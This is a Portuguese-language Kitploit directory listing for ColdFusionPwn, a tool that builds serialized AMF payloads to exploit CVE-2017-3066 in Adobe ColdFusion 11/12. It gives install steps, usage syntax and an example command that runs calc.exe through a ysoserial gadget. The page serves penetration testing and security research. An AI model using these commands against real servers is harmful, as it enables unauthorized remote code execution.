Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ColdFusionPwn — Ferramenta de Exploração para CVE-2017-3066 direcionada a Adobe Coldfusion 11/12 | Kitploit
Ferramentas/GitHubGitHub/codewhitesec/coldfusionpwn
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

Ferramenta de Exploração para CVE-2017-3066 direcionada a Adobe Coldfusion 11/12

Ver Repositório
9529há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ColdFusionPwn

Ferramenta de Exploração para CVE-2017-3066 visando Adobe Coldfusion 11/12.

Descrição

A ferramenta permite gerar payloads AMF serializados para explorar a validação de entrada ausente de classes permitidas. Para detalhes, veja nosso post no blog.

Instalação

Obtenha a versão mais recente do ysoserial. Obtenha o ColdFusionPwn a partir dos releases.

Uso

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Técnica Setter (CF11) ou Externalizable Exploit (CF11/12)
- [payload type]  payload gadget ysoserial 
- [command]       comando a ser executado
- [outfile]       arquivo de saída para o payload gerado

É necessário ter ColdFusionPwn-0.0.1-SNAPSHOT-all.jar como primeira entrada no classpath, pois a biblioteca ApacheCommons BeanUtils fornecida com ysoserial é mais nova (e tem um uid de serialversion diferente).

Exemplos

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
Baixar ferramenta